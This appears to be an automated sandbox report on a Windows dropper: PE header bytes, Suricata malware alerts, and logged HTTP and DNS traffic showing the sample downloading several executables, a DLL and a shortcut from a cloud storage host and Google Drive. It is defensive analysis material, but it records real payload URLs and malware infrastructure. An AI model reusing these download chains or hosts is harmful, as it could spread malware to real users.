70 03 00 00 10 00 00 29 54 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 90 7b 02 00 43 00 00 00 70 67 02 00 a0 00 00 00 00 e0 02 00 0c 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 78 1f 00 00 70 14 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 43 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 c4 03 00 00 e8 66 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5e f3 01 00 00 10 00 00 00 00 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d3 6b 00 00 00 10 02 00 00 70 00 00 00 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 5a 00 00 00 80 02 00 00 20 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 0c 3a 00 00 00 e0 02 00 00 40 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c6 49 00 00 00 20 03 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sqqg#RichPEL&g! Bp)T{Cpg:
                      Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                      Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: Network trafficSuricata IDS: 2021245 - Severity 1 - ET MALWARE Possible Dridex Download URI Struct with no referer : 192.168.2.4:49730 -> 47.254.187.72:80
                      Source: Network trafficSuricata IDS: 2022550 - Severity 1 - ET MALWARE Possible Malicious Macro DL EXE Feb 2016 : 192.168.2.4:49730 -> 47.254.187.72:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 47.254.187.72:80
                      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49730 -> 47.254.187.72:80
                      Source: global trafficHTTP traffic detected: GET /270/1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bruplong.oss-accelerate.aliyuncs.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /270/2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bruplong.oss-accelerate.aliyuncs.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /270/3.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bruplong.oss-accelerate.aliyuncs.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /270/4.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bruplong.oss-accelerate.aliyuncs.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /270/wic.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bruplong.oss-accelerate.aliyuncs.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /270/cbas.exe HTTP/1.1User-Agent: Mozilla/4.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+LinLauncher)Host: bruplong.oss-accelerate.aliyuncs.com
                      Source: global trafficHTTP traffic detected: GET /270/msslac.dll HTTP/1.1User-Agent: Mozilla/4.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+LinLauncher)Host: bruplong.oss-accelerate.aliyuncs.com
                      Source: global trafficHTTP traffic detected: GET /270/cbas.lnk HTTP/1.1User-Agent: Mozilla/4.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+LinLauncher)Host: bruplong.oss-accelerate.aliyuncs.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Windows\wic.exeCode function: 11_2_00E835BB GetTickCount,GetTickCount,InternetReadFile,GetTickCount,GetTickCount,InternetCloseHandle,InternetCloseHandle,PostMessageA,11_2_00E835BB
                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=kc7xeLmHTbeshB1Kt41DRtFAHA16V2PEFTYZdyQO9kOuTtHSyFi4VkjSX8fRh9cZHHzD1aZrzARFPp9wwum22RqvtaeL2i6LDE0ezo9HINww6nkdgcLq35QtHVg4imOIO4H9qxwpv7D99I4LuZZgVtSd4dPvyYC3_xONL11tUVsyB5G1P1sbfC0
                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=kc7xeLmHTbeshB1Kt41DRtFAHA16V2PEFTYZdyQO9kOuTtHSyFi4VkjSX8fRh9cZHHzD1aZrzARFPp9wwum22RqvtaeL2i6LDE0ezo9HINww6nkdgcLq35QtHVg4imOIO4H9qxwpv7D99I4LuZZgVtSd4dPvyYC3_xONL11tUVsyB5G1P1sbfC0
                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=kc7xeLmHTbeshB1Kt41DRtFAHA16V2PEFTYZdyQO9kOuTtHSyFi4VkjSX8fRh9cZHHzD1aZrzARFPp9wwum22RqvtaeL2i6LDE0ezo9HINww6nkdgcLq35QtHVg4imOIO4H9qxwpv7D99I4LuZZgVtSd4dPvyYC3_xONL11tUVsyB5G1P1sbfC0
                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=kc7xeLmHTbeshB1Kt41DRtFAHA16V2PEFTYZdyQO9kOuTtHSyFi4VkjSX8fRh9cZHHzD1aZrzARFPp9wwum22RqvtaeL2i6LDE0ezo9HINww6nkdgcLq35QtHVg4imOIO4H9qxwpv7D99I4LuZZgVtSd4dPvyYC3_xONL11tUVsyB5G1P1sbfC0
                      Source: global trafficHTTP traffic detected: GET /270/1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bruplong.oss-accelerate.aliyuncs.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /270/2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bruplong.oss-accelerate.aliyuncs.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /270/3.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bruplong.oss-accelerate.aliyuncs.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /270/4.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bruplong.oss-accelerate.aliyuncs.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /270/wic.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bruplong.oss-accelerate.aliyuncs.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /270/cbas.exe HTTP/1.1User-Agent: Mozilla/4.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+LinLauncher)Host: bruplong.oss-accelerate.aliyuncs.com
                      Source: global trafficHTTP traffic detected: GET /270/msslac.dll HTTP/1.1User-Agent: Mozilla/4.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+LinLauncher)Host: bruplong.oss-accelerate.aliyuncs.com
                      Source: global trafficHTTP traffic detected: GET /270/cbas.lnk HTTP/1.1User-Agent: Mozilla/4.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+LinLauncher)Host: bruplong.oss-accelerate.aliyuncs.com
                      Source: global trafficDNS traffic detected: DNS query: bruplong.oss-accelerate.aliyuncs.com
                      Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                      Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                      Source: global trafficDNS traffic detected: DNS query: docs.google.com
                      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC47w-qW8SWFOir8jseBMN5Zm2fnWJKBX3fIboutLCpIm889aHoM16E_vnpa78FMkXIXContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:35:59 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-SqMzk4jmfdgy01mO5kIAwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=kc7xeLmHTbeshB1Kt41DRtFAHA16V2PEFTYZdyQO9kOuTtHSyFi4VkjSX8fRh9cZHHzD1aZrzARFPp9wwum22RqvtaeL2i6LDE0ezo9HINww6nkdgcLq35QtHVg4imOIO4H9qxwpv7D99I4LuZZgVtSd4dPvyYC3_xONL11tUVsyB5G1P1sbfC0; expires=Fri, 04-Jul-2025 19:35:59 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7DlfLHuS1GkP7G6C_WpFNx9iHLad_JAiFWI13_tl3cbeGV2YQrPZ_0YjiOgzDi7UWUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:36:02 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-TO2LLdMzwWzFICe98aqa2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6zL-cB_Tsb3TfcKEY9YtjphCpf3gn_SFraLuN5OgxPYc52lAUIxKtOr7vEoGKyQHPyM1UPmpkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:36:04 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_U9mHaZ6kW3xTkTXsaeOZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                      Source: ._cache_1.exe, ._cache_1.exe, 00000002.00000002.1740103618.000000000077E000.00000004.00000020.00020000.00000000.sdmp, ._cache_1.exe, 00000002.00000002.1740179585.000000000079B000.00000004.00000020.00020000.00000000.sdmp, ._cache_1.exe, 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, ._cache_1.exe, 00000002.00000003.1739534840.0000000000798000.00000004.00000020.00020000.00000000.sdmp, ._cache_1.exe, 00000002.00000003.1739384768.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://LineageTheBloodPledge.com/.
                      Source: ._cache_1.exe, 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: http://LineageTheBloodPledge.com/.lin.binUpdError.txtrestime.dattime.dat210.81.242.130202.85.231.112
                      Source: file.exe, 00000000.00000003.1708813251.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/
                      Source: file.exe, 00000000.00000003.1708813251.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/%%bruplong.oss-accelerate.aliyuncs.com
                      Source: file.exe, 00000000.00000003.1708813251.0000000000705000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1708777064.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/1.exe
                      Source: file.exe, 00000000.00000002.1801335644.0000000000706000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800217674.0000000000706000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1708813251.0000000000705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/1.exe#B
                      Source: file.exe, 00000000.00000002.1801335644.0000000000706000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800217674.0000000000706000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1708813251.0000000000705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/1.exeKB
                      Source: file.exe, 00000000.00000003.1708777064.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/1.exeLMEMp
                      Source: file.exe, 00000000.00000003.1708777064.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/1.exeNNC:
                      Source: file.exe, 00000000.00000003.1708813251.0000000000705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/1.exe_
                      Source: file.exe, 00000000.00000002.1801335644.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800217674.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/1.exeaa
                      Source: file.exe, 00000000.00000003.1708777064.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/1.exellC:
                      Source: file.exe, 00000000.00000003.1708813251.0000000000705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/1.exex
                      Source: file.exe, 00000000.00000003.1800217674.0000000000706000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800217674.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/2.exe
                      Source: file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/2.exe?
                      Source: file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/2.exet
                      Source: file.exe, 00000000.00000002.1801335644.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800902274.0000000000404000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800217674.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/3.exe
                      Source: file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/3.exe1
                      Source: file.exe, 00000000.00000003.1764737231.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800217674.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/4.exe
                      Source: file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/4.exeF
                      Source: wic.exe, 0000000B.00000002.3538860898.000000000160E000.00000004.00000020.00020000.00000000.sdmp, wic.exe.0.dr, wic[1].exe.0.drString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.exe
                      Source: wic.exe, 0000000B.00000000.1799136325.0000000001003000.00000002.00000001.01000000.00000018.sdmp, wic.exe, 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmp, wic.exe.0.dr, wic[1].exe.0.drString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.exeC:
                      Source: wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmp, wic.exe.0.dr, wic[1].exe.0.drString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnk
                      Source: wic.exe, 0000000B.00000002.3538860898.0000000001681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnk&
                      Source: wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnk32P;
                      Source: wic.exe, 0000000B.00000002.3538860898.0000000001681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkI
                      Source: wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkP:
                      Source: wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkl
                      Source: wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkl:
                      Source: wic.exe, 0000000B.00000002.3538860898.0000000001681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkm
                      Source: wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkp:
                      Source: wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkp;
                      Source: wic.exe, 0000000B.00000003.1823701424.000000000169D000.00000004.00000020.00020000.00000000.sdmp, wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmp, wic.exe.0.dr, wic[1].exe.0.drString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/msslac.dll
                      Source: wic.exe, 0000000B.00000003.1823701424.000000000169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/msslac.dll:
                      Source: wic.exe, 0000000B.00000000.1799136325.0000000001003000.00000002.00000001.01000000.00000018.sdmp, wic.exe, 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmp, wic.exe.0.dr, wic[1].exe.0.drString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/msslac.dllhttp://bruplong.oss-accelerate.aliyuncs.co
                      Source: wic.exe, 0000000B.00000003.1823701424.000000000169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/msslac.dllp;
                      Source: file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exe
                      Source: file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exe0
                      Source: file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exeG
                      Source: file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exeU
                      Source: file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exed
                      Source: file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exes
                      Source: file.exe, 00000000.00000002.1804354538.0000000000785000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800183063.0000000000781000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exewsC:
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: ._cache_2.exe.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                      Source: 2[1].exe.0.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                      Source: file.exe, RCXF308.tmp.3.dr, RCXF376.tmp.3.drString found in binary or memory: http://google.com
